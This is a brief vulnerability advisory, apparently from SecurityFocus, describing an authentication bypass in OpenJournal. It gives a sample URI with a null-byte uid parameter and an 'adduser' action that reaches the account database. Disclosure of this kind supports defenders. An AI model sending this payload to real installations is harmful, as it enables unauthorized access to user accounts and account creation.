OpenJournal Authentication Bypassing Vulnerability

No exploit is required to leverage this issue. The following URI will allow an attacker to gain access to the software account database:

http://www.test.com/cgi-bin/oj.cgi?db=default&uid=%00&userid=hacker&auth=adduser


 

Privacy Statement
Copyright 2010, SecurityFocus